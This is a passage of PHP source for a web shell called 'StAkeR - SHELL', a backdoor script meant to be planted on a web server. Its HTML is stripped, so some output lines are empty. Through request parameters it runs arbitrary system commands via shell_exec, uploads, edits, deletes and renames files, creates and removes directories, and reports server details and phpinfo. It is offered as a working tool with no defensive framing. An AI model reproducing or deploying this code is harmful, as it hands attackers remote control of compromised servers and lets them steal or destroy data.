location.href='$file'"; $mkdir = $_GET['mkdir']; $rmdir = $_GET['rmdir']; // PHP INFO if($phpinfo == 1) { phpinfo(); die(); } echo << StAkeR - SHELL <- > Shell in: $shell Uname -a: $uname Server Address: $server Server Name: $sname Server Type: $soft IP Address: $ip User Agent: $ua PHPInfo: Here
Delete File:  
Delete Dir:   
Read File:    
Create Dir:   
Upload File: 
Shell Exec:   
F Rename:   
File Copy:    

ONE; // File List,Recursive! if(isset($dir)) { chdir($dir); } foreach (glob("*") as $files) { $perms = substr(sprintf('%o', fileperms($files)), -4); if(is_file($files)) { if(isset($dir)) { echo ""; echo ""; echo ""; echo ""; echo ""; } else { echo ""; echo ""; echo ""; echo ""; echo ""; } } if(is_dir($files)) { if(isset($dir)) { echo ""; echo ""; echo ""; echo ""; } else { echo ""; echo ""; echo ""; echo ""; } } } echo "
$filesRemoveViewEdit$perms
$filesRemoveViewEdit$perms
$filesRemoveChdirDirectory$perms
$filesRemoveChdirDirectory$perms
"; // Remove File if(isset($remove_file) and is_writable($remove_file)) { if(unlink($remove_file)) { echo ""; echo $reload; } else { echo ""; } } // Upload File if(isset($_FILES['upload'])) { $tmp = $_FILES['upload']['tmp_name']; $up = basename($_FILES['upload']['name']); if(move_uploaded_file($tmp,$up)) { echo ""; } else { echo ""; } } // Command Execute if(isset($exec)) { $execute = shell_exec($exec); if($execute) { echo ""; } } // View File if(isset($vfile) and is_readable($vfile)) { echo "
".htmlentities(file_get_contents($vfile))."
"; } // Edit File if(isset($fedit) and is_writable($fedit)) { $text = htmlspecialchars(join(file($fedit))); echo "
"; echo "
"; echo ""; echo "
"; if(file_exists($fedit)) { $writez =fopen($fedit,'w+'); $new_text = stripslashes($_POST['text']); fwrite($writez,$new_text); fclose($writez); } } // Rename File or Directory if(file_exists($frename) and isset($frename) and !file_exists($nrename)) { rename($frename,$nrename); echo ""; echo $reload; } // Copy File if(file_exists($fcopy) and isset($rcopy) and !file_exists($rcopy) and is_file($fcopy)) { copy($fcopy,$rcopy); echo ""; echo $reload; } // Create Directory if(isset($mkdir)) { if(mkdir($mkdir)) { echo ""; echo $reload; } } // Remove Directory if(isset($rmdir)) { if(rmdir($rmdir)) { echo ""; echo $reload; } } // Author: StAkeR ~ StAkeR@hotmail.it // v.0.1 ~ 24 Jul 2008 ?>